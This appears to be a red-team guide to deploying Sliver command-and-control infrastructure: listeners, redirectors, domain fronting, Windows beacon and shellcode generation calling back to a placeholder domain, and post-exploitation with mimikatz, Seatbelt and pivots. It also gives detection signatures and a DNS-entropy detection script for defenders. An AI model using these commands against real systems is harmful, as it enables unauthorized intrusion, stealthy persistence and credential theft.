# Building C2 Infrastructure with Sliver Framework
## Overview
Sliver is an open-source, cross-platform adversary emulation framework developed by BishopFox, written in Go. It provides red teams with implant generation, multi-protocol C2 channels (mTLS, HTTP/S, DNS, WireGuard), multi-operator support, and extensive post-exploitation capabilities. Sliver supports beacon (asynchronous) and session (interactive) modes, making it suitable for both long-haul operations and interactive exploitation. A properly architected Sliver infrastructure uses redirectors, domain fronting, and HTTPS certificates to maintain operational resilience and avoid detection.
## When to Use
- When deploying or configuring Sliver-based C2 infrastructure in your environment
- When establishing security controls aligned to compliance requirements
- When building or improving security architecture for this domain
- When conducting security assessments that require this implementation
## Prerequisites
- Familiarity with red teaming concepts and tools
- Access to a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities
## Objectives
- Deploy a Sliver team server on hardened cloud infrastructure
- Configure HTTPS, mTLS, DNS, and WireGuard listeners
- Generate implants (beacons and sessions) for target platforms
- Set up NGINX or Apache redirectors between implants and the team server
- Implement Cloudflare or CDN-based domain fronting for traffic obfuscation
- Configure multi-operator access with certificate-based authentication
- Establish operational security controls for C2 communications
## MITRE ATT&CK Mapping
- T1071.001 - Application Layer Protocol: Web Protocols
- T1071.004 - Application Layer Protocol: DNS
- T1573.002 - Encrypted Channel: Asymmetric Cryptography
- T1090.002 - Proxy: External Proxy (Redirectors)
- T1105 - Ingress Tool Transfer
- T1132.001 - Data Encoding: Standard Encoding
- T1572 - Protocol Tunneling
## Workflow
### Phase 1: Team Server Deployment
- Provision a VPS (e.g., DigitalOcean, Linode, AWS EC2) for the team server
- Harden the OS: disable SSH password auth, configure UFW/iptables, install fail2ban
- Install Sliver using the official install script:

```bash
curl https://sliver.sh/install | sudo bash
```

- Start the Sliver server daemon:

```bash
systemctl start sliver
# Or run interactively
sliver-server
```

- Generate operator configuration files for team members (run inside the sliver-server console):

```bash
new-operator --name operator1 --lhost <team-server-ip>
```
### Phase 2: Listener Configuration
- Configure an HTTPS listener with a legitimate SSL certificate:

```bash
https --lhost 0.0.0.0 --lport 443 --domain c2.example.com --cert /path/to/cert.pem --key /path/to/key.pem
```

- Configure a DNS listener for fallback C2:

```bash
dns --domains c2dns.example.com --lport 53
```

- Configure an mTLS listener for high-security sessions:

```bash
mtls --lhost 0.0.0.0 --lport 8888
```

- Configure a WireGuard listener for tunneled access:

```bash
wg --lport 51820
```
### Phase 3: Redirector Setup
- Deploy a separate VPS as a redirector (positioned between targets and team server)
- Install and configure NGINX as a reverse proxy:

```nginx
server {
    listen 443 ssl;
    server_name c2.example.com;
    ssl_certificate /etc/letsencrypt/live/c2.example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/c2.example.com/privkey.pem;

    location / {
        proxy_pass https://<team-server-ip>:443;
        # The team server presents a self-signed certificate, so upstream verification is disabled
        proxy_ssl_verify off;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}
```

- Configure iptables rules on the team server to only accept connections from the redirector:

```bash
# The ACCEPT rule must be appended before the DROP rule so it is evaluated first
iptables -A INPUT -p tcp --dport 443 -s <redirector-ip> -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
```

- Optionally set up Cloudflare as a CDN layer in front of the redirector for domain fronting
### Phase 4: Implant Generation
- Generate an HTTPS beacon implant:

```bash
generate beacon --http https://c2.example.com --os windows --arch amd64 --format exe --name payload
```

- Generate a DNS beacon for restricted networks:

```bash
generate beacon --dns c2dns.example.com --os windows --arch amd64
```

- Generate a shellcode payload for injection:

```bash
generate --http https://c2.example.com --os windows --arch amd64 --format shellcode
```

- Configure beacon jitter and callback intervals:

```bash
generate beacon --http https://c2.example.com --seconds 60 --jitter 30
```
### Phase 5: Post-Exploitation Operations
- Interact with active beacons/sessions:

```bash
beacons          # List active beacons
use <beacon-id>  # Interact with a beacon
```

- Execute post-exploitation modules:

```bash
ps                                                  # Process listing
netstat                                             # Network connections
execute-assembly /path/to/Seatbelt.exe -group=all   # Run .NET assemblies
sideload /path/to/mimikatz.dll                      # Load DLLs
```

- Set up pivots for internal network access:

```bash
pivots tcp --bind 0.0.0.0:9898  # Create pivot listener on compromised host
```

- Use BOF (Beacon Object Files) for in-memory execution:

```bash
armory install sa-ldapsearch            # Install from armory
sa-ldapsearch -- "(objectClass=user)"   # Execute BOF
```
## Tools and Resources
| Tool | Purpose | Platform |
|---|---|---|
| Sliver Server | C2 team server and implant management | Linux/macOS/Windows |
| Sliver Client | Operator console for team members | Cross-platform |
| NGINX | Redirector and reverse proxy | Linux |
| Certbot | Let's Encrypt SSL certificate generation | Linux |
| Cloudflare | CDN and domain fronting | Cloud |
| Armory | Sliver extension/BOF package manager | Built-in |
## Detection Signatures
| Indicator | Detection Method |
|---|---|
| Default Sliver HTTP headers | Network traffic analysis for unusual User-Agent strings |
| mTLS on non-standard ports | Firewall logs for outbound connections to unusual ports |
| DNS TXT record queries with high entropy | DNS log analysis for encoded C2 traffic |
| WireGuard UDP traffic on port 51820 | Network flow analysis for WireGuard handshake patterns |
| Sliver implant file hashes | EDR/AV signature matching against known Sliver samples |
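The DNS TXT entropy indicator in the table above, worked through as a small detection script. This is an added example, not code from the original page or from the Sliver project; the log line format, the `c2dns.example.com` sample queries and the length/entropy thresholds are constructed assumptions to be tuned against your resolver's own baseline.

```python
import math
import re
from collections import Counter

# Constructed sample DNS query log lines (hypothetical format:
# "<timestamp> <client-ip> <qtype> <qname>"); not taken from any real resolver.
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01Z 10.0.0.15 A www.example.com
2024-05-01T10:00:02Z 10.0.0.15 TXT 7k2q9xz3m4bnl8vp1r.c2dns.example.com
2024-05-01T10:00:03Z 10.0.0.15 TXT s8d2jq0w4xz9ymnb6t.c2dns.example.com
2024-05-01T10:00:04Z 10.0.0.22 TXT _dmarc.example.com
2024-05-01T10:00:05Z 10.0.0.15 A mail.example.com
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")

def shannon_entropy(s: str) -> float:
    """Bits per character of a label: ~0 for repeated characters, ~4+ for encoded data."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def is_suspicious_query(qtype: str, qname: str,
                        min_len: int = 12, min_entropy: float = 3.5) -> bool:
    """Flag TXT lookups whose leftmost label is long and high-entropy (assumed thresholds)."""
    if qtype.upper() != "TXT":
        return False
    first = qname.rstrip(".").split(".")[0]
    return len(first) >= min_len and shannon_entropy(first) >= min_entropy

def find_dns_c2_candidates(log_text: str, min_hits: int = 2) -> dict:
    """Return {client_ip: [qnames]} for clients with at least min_hits suspicious TXT queries."""
    hits = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        _ts, client, qtype, qname = m.groups()
        if is_suspicious_query(qtype, qname):
            hits.setdefault(client, []).append(qname)
    return {ip: names for ip, names in hits.items() if len(names) >= min_hits}

if __name__ == "__main__":
    for ip, names in find_dns_c2_candidates(SAMPLE_DNS_LOG).items():
        print(f"{ip}: {len(names)} high-entropy TXT queries, e.g. {names[0]}")
```

Short legitimate labels such as `_dmarc` fall under the length threshold, so only the repeated encoded-label queries from one client are reported.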
## Validation Criteria
- Team server deployed and hardened with firewall rules
- HTTPS listener configured with valid SSL certificate
- DNS listener configured as fallback C2 channel
- At least one redirector deployed between targets and team server
- Multi-operator access configured with unique certificates
- Implants generated for target operating systems
- Beacon callback intervals and jitter configured for stealth
- Post-exploitation modules tested (process listing, .NET assembly execution)
- Pivot functionality validated for internal network access
- All C2 traffic encrypted and passing through redirectors